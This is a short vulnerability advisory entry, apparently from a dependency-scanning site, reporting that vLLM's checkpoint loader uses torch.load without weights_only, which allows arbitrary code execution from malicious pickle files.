Safety vulnerability ID: 76350
The information on this page was manually curated by our Cybersecurity Intelligence Team.
The vllm/modelexecutor/weightutils.py implements hfmodelweightsiterator to load the model checkpoint, which is downloaded from huggingface. It use torch.load function and weightsonly parameter is default value False. There is a security warning on https://pytorch.org/docs/stable/generated/torch.load.html, when torch.load load a malicious pickle data it will execute arbitrary code during unpickling.
Latest version: 0.8.3
A high-throughput and memory-efficient inference and serving engine for LLMs
This vulnerability has no description
Scan your Python project for dependency vulnerabilities in two minutes
Scan your application